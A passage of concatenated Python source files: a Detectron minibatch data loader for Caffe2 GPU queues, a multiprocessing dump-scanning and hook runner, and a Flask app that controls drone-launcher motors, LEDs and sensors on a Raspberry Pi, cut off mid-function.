minibatch queue. Each GPU has an enqueue thread that pulls a minibatch off the
minibatch queue, feeds the minibatch blobs into the workspace, and then runs
an EnqueueBlobsOp to place the minibatch blobs into the GPU's blobs queue.
During each fprop the first thing the network does is run a DequeueBlobsOp
in order to populate the workspace with the blobs from a queued minibatch.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import deque
from collections import OrderedDict
import logging
import numpy as np
import Queue
import signal
import threading
import time
import uuid
from caffe2.python import core, workspace
from detectron.core.config import cfg
from detectron.roi_data.minibatch import get_minibatch
from detectron.roi_data.minibatch import get_minibatch_blob_names
from detectron.utils.coordinator import coordinated_get
from detectron.utils.coordinator import coordinated_put
from detectron.utils.coordinator import Coordinator
import detectron.utils.c2 as c2_utils
logger = logging.getLogger(__name__)
class RoIDataLoader(object):
def __init__(
self,
roidb,
num_loaders=4,
minibatch_queue_size=64,
blobs_queue_capacity=8
):
self._roidb = roidb
self._lock = threading.Lock()
self._perm = deque(range(len(self._roidb)))
self._cur = 0 # _perm cursor
# The minibatch queue holds prepared training data in host (CPU) memory
# When training with N > 1 GPUs, each element in the minibatch queue
# is actually a partial minibatch which contributes 1 / N of the
# examples to the overall minibatch
self._minibatch_queue = Queue.Queue(maxsize=minibatch_queue_size)
self._blobs_queue_capacity = blobs_queue_capacity
# Random queue name in case one instantiates multple RoIDataLoaders
self._loader_id = uuid.uuid4()
self._blobs_queue_name = 'roi_blobs_queue_{}'.format(self._loader_id)
# Loader threads construct (partial) minibatches and put them on the
# minibatch queue
self._num_loaders = num_loaders
self._num_gpus = cfg.NUM_GPUS
self.coordinator = Coordinator()
self._output_names = get_minibatch_blob_names()
self._shuffle_roidb_inds()
self.create_threads()
def minibatch_loader_thread(self):
"""Load mini-batches and put them onto the mini-batch queue."""
with self.coordinator.stop_on_exception():
while not self.coordinator.should_stop():
blobs = self.get_next_minibatch()
# Blobs must be queued in the order specified by
# self.get_output_names
ordered_blobs = OrderedDict()
for key in self.get_output_names():
assert blobs[key].dtype in (np.int32, np.float32), \
'Blob {} of dtype {} must have dtype of ' \
'np.int32 or np.float32'.format(key, blobs[key].dtype)
ordered_blobs[key] = blobs[key]
coordinated_put(
self.coordinator, self._minibatch_queue, ordered_blobs
)
logger.info('Stopping mini-batch loading thread')
def enqueue_blobs_thread(self, gpu_id, blob_names):
"""Transfer mini-batches from a mini-batch queue to a BlobsQueue."""
with self.coordinator.stop_on_exception():
while not self.coordinator.should_stop():
if self._minibatch_queue.qsize == 0:
logger.warning('Mini-batch queue is empty')
blobs = coordinated_get(self.coordinator, self._minibatch_queue)
self.enqueue_blobs(gpu_id, blob_names, blobs.values())
logger.debug(
'batch queue size {}'.format(self._minibatch_queue.qsize())
)
logger.info('Stopping enqueue thread')
def get_next_minibatch(self):
"""Return the blobs to be used for the next minibatch. Thread safe."""
valid = False
while not valid:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
blobs, valid = get_minibatch(minibatch_db)
return blobs
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb. Not thread safe."""
if cfg.TRAIN.ASPECT_GROUPING:
widths = np.array([r['width'] for r in self._roidb])
heights = np.array([r['height'] for r in self._roidb])
horz = (widths >= heights)
vert = np.logical_not(horz)
horz_inds = np.where(horz)[0]
vert_inds = np.where(vert)[0]
horz_inds = np.random.permutation(horz_inds)
vert_inds = np.random.permutation(vert_inds)
mb = cfg.TRAIN.IMS_PER_BATCH
horz_inds = horz_inds[:(len(horz_inds) // mb) * mb]
vert_inds = vert_inds[:(len(vert_inds) // mb) * mb]
inds = np.hstack((horz_inds, vert_inds))
inds = np.reshape(inds, (-1, mb))
row_perm = np.random.permutation(np.arange(inds.shape[0]))
inds = np.reshape(inds[row_perm, :], (-1, ))
self._perm = inds
else:
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._perm = deque(self._perm)
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch. Thread safe."""
with self._lock:
# We use a deque and always take the *first* IMS_PER_BATCH items
# followed by *rotating* the deque so that we see fresh items
# each time. If the length of _perm is not divisible by
# IMS_PER_BATCH, then we end up wrapping around the permutation.
db_inds = [self._perm[i] for i in range(cfg.TRAIN.IMS_PER_BATCH)]
self._perm.rotate(-cfg.TRAIN.IMS_PER_BATCH)
self._cur += cfg.TRAIN.IMS_PER_BATCH
if self._cur >= len(self._perm):
self._shuffle_roidb_inds()
return db_inds
def get_output_names(self):
return self._output_names
def enqueue_blobs(self, gpu_id, blob_names, blobs):
"""Put a mini-batch on a BlobsQueue."""
assert len(blob_names) == len(blobs)
t = time.time()
dev = c2_utils.CudaDevice(gpu_id)
queue_name = 'gpu_{}/{}'.format(gpu_id, self._blobs_queue_name)
blob_names = ['gpu_{}/{}'.format(gpu_id, b) for b in blob_names]
for (blob_name, blob) in zip(blob_names, blobs):
workspace.FeedBlob(blob_name, blob, device_option=dev)
logger.debug(
'enqueue_blobs {}: workspace.FeedBlob: {}'.
format(gpu_id, time.time() - t)
)
t = time.time()
op = core.CreateOperator(
'SafeEnqueueBlobs', [queue_name] + blob_names,
blob_names + [queue_name + '_enqueue_status'],
device_option=dev
)
workspace.RunOperatorOnce(op)
logger.debug(
'enqueue_blobs {}: workspace.RunOperatorOnce: {}'.
format(gpu_id, time.time() - t)
)
def create_threads(self):
# Create mini-batch loader threads, each of which builds mini-batches
# and places them into a queue in CPU memory
self._workers = [
threading.Thread(target=self.minibatch_loader_thread)
for _ in range(self._num_loaders)
]
# Create one BlobsQueue per GPU
# (enqueue_blob_names are unscoped)
enqueue_blob_names = self.create_blobs_queues()
# Create one enqueuer thread per GPU
self._enqueuers = [
threading.Thread(
target=self.enqueue_blobs_thread,
args=(gpu_id, enqueue_blob_names)
) for gpu_id in range(self._num_gpus)
]
def start(self, prefill=False):
for w in self._workers + self._enqueuers:
w.start()
if prefill:
logger.info('Pre-filling mini-batch queue...')
while not self._minibatch_queue.full():
logger.info(
' [{:d}/{:d}]'.format(
self._minibatch_queue.qsize(),
self._minibatch_queue.maxsize
)
)
time.sleep(0.1)
# Detect failure and shutdown
if self.coordinator.should_stop():
self.shutdown()
break
def shutdown(self):
self.coordinator.request_stop()
self.coordinator.wait_for_stop()
self.close_blobs_queues()
for w in self._workers + self._enqueuers:
w.join()
def create_blobs_queues(self):
"""Create one BlobsQueue for each GPU to hold mini-batches."""
for gpu_id in range(self._num_gpus):
with c2_utils.GpuNameScope(gpu_id):
workspace.RunOperatorOnce(
core.CreateOperator(
'CreateBlobsQueue', [], [self._blobs_queue_name],
num_blobs=len(self.get_output_names()),
capacity=self._blobs_queue_capacity
)
)
return self.create_enqueue_blobs()
def close_blobs_queues(self):
"""Close a BlobsQueue."""
for gpu_id in range(self._num_gpus):
with core.NameScope('gpu_{}'.format(gpu_id)):
workspace.RunOperatorOnce(
core.CreateOperator(
'CloseBlobsQueue', [self._blobs_queue_name], []
)
)
def create_enqueue_blobs(self):
blob_names = self.get_output_names()
enqueue_blob_names = [
'{}_enqueue_{}'.format(b, self._loader_id) for b in blob_names
]
for gpu_id in range(self._num_gpus):
with c2_utils.NamedCudaScope(gpu_id):
for blob in enqueue_blob_names:
workspace.CreateBlob(core.ScopedName(blob))
return enqueue_blob_names
def register_sigint_handler(self):
def signal_handler(signal, frame):
logger.info(
'SIGINT: Shutting down RoIDataLoader threads and exiting...'
)
self.shutdown()
signal.signal(signal.SIGINT, signal_handler)
|
remote.py
|
# -*- coding: utf-8 -*-
# pylint: disable=import-error, no-name-in-module
import contextlib
import multiprocessing
import os
import queue
import signal
import time
import traceback
import warnings
from const import DUMP_PATH, HOOK_CPU, INTERVAL, QUEUE_DUMP, QUEUE_LOGS, SCAN_CPU
from scan import lookup, scan
try:
from sites import HOOK
except ImportError:
HOOK = list()
try:
from sites import EXIT
except ImportError:
EXIT = list()
###############################################################################
# join flags
JOIN_DUMP = multiprocessing.Value('B', False)
JOIN_LOGS = multiprocessing.Value('B', False)
def join_dump(*args, **kwargs): # pylint: disable=unused-argument
JOIN_DUMP.value = True
def join_logs(*args, **kwargs): # pylint: disable=unused-argument
JOIN_LOGS.value = True
# signal handling
signal.signal(signal.SIGUSR1, join_dump)
signal.signal(signal.SIGUSR2, join_logs)
###############################################################################
class HookWarning(Warning):
pass
def wrapper_logs(args):
func, log_name = args
return func(log_name)
def wrapper_func(func):
return func()
def hook(log_name):
if HOOK_CPU <= 1:
[func(log_name) for func in HOOK] # pylint: disable=expression-not-assigned
else:
multiprocessing.Pool(HOOK_CPU).map(wrapper_logs, map(lambda func: (func, log_name), HOOK)) ## pylint: disable=map-builtin-not-iterating
def remote_logs(): # pylint: disable=inconsistent-return-statements
if len(HOOK) < 1:
return
while True:
try:
log_name = QUEUE_LOGS.get_nowait()
try:
hook(log_name)
except Exception:
traceback.print_exc()
warnings.warn(f'hook execution failed on {log_name!r}', HookWarning)
except queue.Empty:
if JOIN_DUMP.value:
break
time.sleep(INTERVAL)
if HOOK_CPU <= 1:
[func() for func in EXIT] # pylint: disable=expression-not-assigned
else:
multiprocessing.Pool(HOOK_CPU).map(wrapper_func, EXIT)
def remote_dump():
max_list = SCAN_CPU ** 2
while True:
dump_list = list()
for _ in range(max_list):
try:
dump = QUEUE_DUMP.get_nowait()
dump_list.append(dump)
except queue.Empty:
break
if dump_list:
if SCAN_CPU <= 1:
[scan(dump) for dump in dump_list] # pylint: disable=expression-not-assigned
else:
multiprocessing.Pool(SCAN_CPU).map(scan, dump_list)
if JOIN_DUMP.value:
break
time.sleep(INTERVAL)
@contextlib.contextmanager
def remote_proc():
# check for remaining extracted files
[QUEUE_DUMP.put(file) for file in lookup(DUMP_PATH)] # pylint: disable=expression-not-assigned
# start main loop
proc_dump = multiprocessing.Process(target=remote_dump)
proc_logs = multiprocessing.Process(target=remote_logs)
proc_dump.start()
proc_logs.start()
try:
yield
except BaseException:
traceback.print_exc()
finally:
os.kill(proc_dump.pid, signal.SIGUSR1)
os.kill(proc_logs.pid, signal.SIGUSR2)
proc_dump.join()
proc_logs.join()
|
dronelauncher_python_final.py
|
#DRONE LAUNCHER
"""
ALL positional rotation is commented out unitl the rotation motor is customized adequately (no jerking)
Please be advised: The launch is NOT connected. This means that any attempts to use functions involving the launch will
result in unwanted delay due to timeout tries on packages.
Launcher use had been commented out to avoid 'bad orders' and therefore poor responses.
As the launcher motor and motor controller is set to be replaced, these 'Launcher' functions, as they are in this script,
will have to be retired anyway. the Flask route will, probably, make use of ctypes to reach the EPOS4 controller
"""
#Import modules
from flask import Flask, render_template, request, jsonify
from roboclaw import Roboclaw
import time
import socket
try:
from neopixel import *
except ImportError:
print("Failure to load Neoplixels")
import argparse
##import threading
try:
import thermo
except IndexError:
print("Failure to find DS18B20")
try:
import MPU9250
except OSError:
print("Remote I/O Error - MPU 92/65")
import RPi.GPIO as GPIO
from time import sleep
from threading import Thread, Event
# LED strip configuration:
LED_COUNT = 60 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).
#LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
# Create NeoPixel object with appropriate configuration.
try:
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)
except NameError:
print("'Adafruit_Neopixel not defined - strip failed to set up'")
#Setup for the pins for threading the lights and the sound
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(23, GPIO.OUT, initial = GPIO.LOW) #Sound
GPIO.setup(24, GPIO.OUT, initial = GPIO.LOW) #Lights
# Define functions which animate LEDs in various ways.
def colorWipe(strip, color, wait_ms=50):
"""Wipe color across display a pixel at a time."""
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
strip.show()
#time.sleep(wait_ms/1000.0) #This sleep in case we want to have a longer intervall between each led lighting
#Function to thread the lights and the sound while the motor is moving
def relay_activate():
while True:
event.wait()
while event.is_set():
GPIO.output(24, GPIO.HIGH)
GPIO.output(23, GPIO.HIGH)
sleep(1)
GPIO.output(24, GPIO.LOW)
GPIO.output(23, GPIO.LOW)
try:
colorWipe(strip, Color(0, 255, 0))
except NameError:
print("Unable to set strip to red")
sleep(1)
try:
colorWipe(strip, Color(255, 255, 255))
except NameError:
print("Unable to set strip to white")
#Open serial port
#Linux comport name
rc = Roboclaw("/dev/ttyACM0",115200)
#Windows comport name
# rc = Roboclaw("COM8",115200)
rc.Open()
#Declare variables
#Specify IP address and port for the server
#Following 'host' assignment is redundant
host=(([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")] or [[(s.connect(("8.8.8.8", 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) + ["no IP found"])[0]
port=5000
address = 0x80 #Controller 1, M1=Pitch, M2=Rotation
address_2 = 0x81 #Controller 2, M1=Lift, M2=Launch
address_3 = 0x82 #Controller 3, M1=Case Open, M2=Case Close
pitch_pulses=355000 #Encoder pulses from the linear actuator
pitch_length=90.0 #Degrees 0 -> 90 degrees (0 vertical, 90 horizontal)
pitch_speed_pulses=7000 #Pulses per second
pitch_speed_manual=127 #From 0 to 127
pitch_ready=65.0 #Pitch degrees for the launch (temporary) 0 is 90 -> 65 is 25
rotation_pulses=950000 #Encoder pulses from the rotation motor
rotation_length=180.0 #Degrees
rotation_speed_pulses=16000 #Pulses per second
rotation_speed_manual=15 #From 0 to 127 - TEST BEFORE INCREASING SPEED -> 15 IS REASONABLE -> POTENTIAL RUNAWAY SPEED IF INCREASED
rotation_ready=5.0 #Rotation degress for the launch (temporary)
lift_pulses=19000 #Encoder pulses from the lifting colum
lift_length=130.0 #cm
lift_speed_pulses=420 #Pulses per second
lift_speed_manual=127 #From 0 to 127
##lift_ready=lift_length #Lift lenght for the launch (temporary)
lift_ready = 20.0 #INDOOR testing extension. Comment out this line and use above line if outside.
launch_pulses=14098 #Encoder pulses from the launch motor - 106 cm
launch_length=106.0 #cm
launch_speed_pulses=6*13400 #Pulses per second during launch (145000 max) (13400 pulses/m)
launch_speed_pulses_slow=2500 #Pulses per second during preparation
launch_speed_manual=15 #From 0 to 127
launch_acceleration=(launch_speed_pulses**2)/13400 #Acceleration during launch (pulses/second2)
launch_max_speed=10 #Maximum launch speed
launch_min_speed=1 #Minimum launch speed
launch_max_acceleration=48 #Maximum launch acceleration
launch_min_acceleration=1 #Minimum launch acceleration
launch_standby=7335 #Drone position during stand-by - 55 cm
launch_mount=16359 #Drone position during mounting - 123 cm
launch_break=20335 #Belt position during breaking - 153 cm
launch_bottom=0 #Drone position at the back part of the capsule - 0 cm
launch_connect=0 #Belt position for touching the upper part - 16.5 cm // Changed to 0 but used to be 2190. Relevant in an older design.
encoders_ready = 0 #At the beggining, the encoders are not ready
#Create an instance of the Flask class for the web app
app = Flask(__name__)
app.debug = True
#Render HTML template
@app.route("/")
def index():
return render_template('dronelauncher_web_test.html')
#Motor controller functions
try:
rc.ForwardM2(address, rotation_speed_manual)
rc.ForwardM2(address,0) #Both commands are used to avoid rotation
except AttributeError:
print("'Roboclaw' object has no attribute '_port' -> roboclaw connection issue")
@app.route('/app_pitch_up', methods=['POST'])
def function_pitch_up():
event.set()
rc.BackwardM1(address, pitch_speed_manual)
return (''), 204 #Returns an empty response
@app.route('/app_pitch_down', methods=['POST'])
def function_pitch_down():
event.set()
rc.ForwardM1(address, pitch_speed_manual)
return (''), 204
@app.route('/app_pitch_position', methods=['POST'])
def function_pitch_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_position = request.form.get('pitch_position', type=int)
if pitch_position > pitch_length or pitch_position < 0:
return (''), 400
elif pitch_position == 0:
pitch_objective = 0
else:
pitch_objective = int(pitch_pulses/(pitch_length/pitch_position))
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_pitch_stop', methods=['POST'])
def function_pitch_stop():
rc.ForwardM1(address,0)
event.clear()
return (''), 204
@app.route('/app_rotation_right', methods=['POST'])
def function_rotation_right():
event.set()
rc.ForwardM2(address, rotation_speed_manual)
return (''), 204
@app.route('/app_rotation_left', methods=['POST'])
def function_rotation_left():
event.set()
rc.BackwardM2(address, rotation_speed_manual)
return (''), 204
@app.route('/app_rotation_position', methods=['POST'])
def function_rotation_position():
## encoders_ready == 0: #Not execute if the encoders are not ready
## return (''), 403
## event.set()
## rotation_position = request.form.get('rotation_position', type=int)
## if rotation_position > rotation_length or rotation_position < -rotation_length:
## return (''), 400
## elif rotation_position == 0:
## rotation_objective = 0
## else:
## rotation_objective = int((rotation_pulses/(rotation_length/rotation_position))/2)
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## event.clear()
## return (''), 204
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## event.clear()
## return (''), 204
pass
@app.route('/app_rotation_stop', methods=['POST'])
def function_rotation_stop():
rc.ForwardM2(address,0)
event.clear()
return (''), 204
@app.route('/app_lift_up', methods=['POST'])
def function_lift_up():
event.set()
rc.ForwardM1(address_2, lift_speed_manual)
return (''), 204
@app.route('/app_lift_down', methods=['POST'])
def function_lift_down():
event.set()
rc.BackwardM1(address_2, lift_speed_manual)
return (''), 204
@app.route('/app_lift_position', methods=['POST'])
def function_lift_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
lift_position = request.form.get('lift_position', type=int)
if lift_position > lift_length or lift_position < 0:
return (''), 400
elif lift_position == 0:
lift_objective = 0
else:
lift_objective = int(lift_pulses/(lift_length/lift_position))
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_lift_stop', methods=['POST'])
def function_lift_stop():
rc.ForwardM1(address_2,0)
event.clear()
return (''), 204
@app.route('/app_launch_forwards', methods=['POST'])
def function_launch_forwards():
## event.set()
## rc.ForwardM2(address_2, launch_speed_manual)
## #rc.SpeedM2(address_2,launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
## return (''), 204
pass
@app.route('/app_launch_backwards', methods=['POST'])
def function_launch_backwards():
## event.set()
## rc.BackwardM2(address_2, launch_speed_manual)
## #rc.SpeedM2(address_2,-launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
## return (''), 204
pass
@app.route('/app_launch_position', methods=['POST'])
def function_launch_position():
## if encoders_ready == 0: #Not execute if the encoders are not ready
## return (''), 403
## event.set()
## launch_position = request.form.get('launch_position', type=int)
## if launch_position > launch_length or launch_position < 0:
## return (''), 400
## else:
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## buffer_2 = (0,0,0)
## while(buffer_2[2]!=0x80): #Loop until all movements are completed
## buffer_2 = rc.ReadBuffers(address_2)
##
## if launch_position == 0:
## launch_objective = 0
## else:
## launch_objective = int(launch_pulses/(launch_length/launch_position))
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual+launch_connect
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## event.clear()
## return (''), 204
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,0)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## event.clear()
## return (''), 204
pass
@app.route('/app_launch_stop', methods=['POST'])
def function_launch_stop():
## rc.ForwardM2(address_2,0)
## event.clear()
## return (''), 204
pass
@app.route('/app_max_pitch', methods=['POST'])
def function_max_pitch():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = pitch_pulses
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_min_pitch', methods=['POST'])
def function_min_pitch():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = 0
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_max_lift', methods=['POST'])
def function_max_lift():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
lift_objective = lift_pulses
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_min_lift', methods=['POST'])
def function_min_lift():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_case_open', methods=['POST'])
def function_case_open():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
else:
## rc.ForwardM1(address_3, 127)
## rc.ForwardM2(address_3, 127)
rc.SpeedDistanceM1M2(address_3, 1500, 6000, 1500, 6000, 1)
return (''), 204
@app.route('/app_case_close', methods=['POST'])
def function_case_close():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
else:
## rc.BackwardM1(address_3, 50)
## rc.BackwardM2(address_3, 50)
rc.SpeedDistanceM1M2(address_3, -500, 6000, -500, 6000, 1)
return (''), 204
@app.route('/app_home', methods=['POST'])
def function_home():
event.set()
rc.BackwardM1(address, pitch_speed_manual)
rc.BackwardM1(address_2, lift_speed_manual)
rc.BackwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,-launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
#Missing rotation limit switch
event.clear()
return (''), 204
@app.route('/app_reset_encoders', methods=['POST'])
def function_reset_encoders():
#rc.ResetEncoders(address)
#rc.ResetEncoders(address_2)
global encoders_ready
encoders_ready = 1 #Encoders have been reset
return (''), 204
@app.route('/app_battery_voltage', methods=['POST'])
def function_battery_voltage():
voltage = round(0.1*rc.ReadMainBatteryVoltage(address)[1],2)
return jsonify(voltage=voltage)
@app.route('/measurements', methods=['GET'])
def data_display():
'''
This function gets the data from the gyrscope and the temp sensor send them to the webpage
'''
# threading.Thread(target = thermo.portread_loop, daemon = False).start()
try:
temp = thermo.read_temp()
except:
temp = 'NaN'
try:
x_rotation = MPU9250.gyro_data()[0]
except:
x_rotation = 'NaN'
try:
y_rotation = MPU9250.gyro_data()[1]
except:
y_rotation = 'NaN'
try:
angle = MPU9250.gyro_data()[2]
except:
angle = 'NaN'
try:
gyro_temp = MPU9250.gyro_data()[3]
except:
gyro_temp = 'NaN'
try:
cpu_temp = MPU9250.gyro_data()[4]
except:
cpu_temp = 'NaN'
return jsonify(temperature=temp,x_rotation=x_rotation,
y_rotation=y_rotation, angle=angle,
gyro_temp=gyro_temp, cpu_temp=cpu_temp)
#Don't forget to add the return variables
@app.route('/app_stop', methods=['POST'])
def function_stop():
rc.ForwardM1(address,0)
rc.ForwardM2(address,0)
rc.ForwardM1(address_2,0)
## rc.ForwardM2(address_2,0) # STOP Launcher
rc.ForwardM1(address_3, 0)
rc.ForwardM2(address_3, 0)
event.clear()
return (''), 204
@app.route('/app_standby', methods=['POST'])
def function_standby():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
## print ('STANDBY MODE')
## colorWipe(strip, Color(255, 255, 255))
pitch_objective = 0
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## rotation_objective = 0
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_standby,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_prepare', methods=['POST'])
def function_prepare():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
rc.SpeedDistanceM1M2(address_3, 1500, 6000, 1500, 6000, 1) #Open case
if pitch_ready == 0:
pitch_objective = 0
else:
pitch_objective = int(pitch_pulses/(pitch_length/pitch_ready))
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
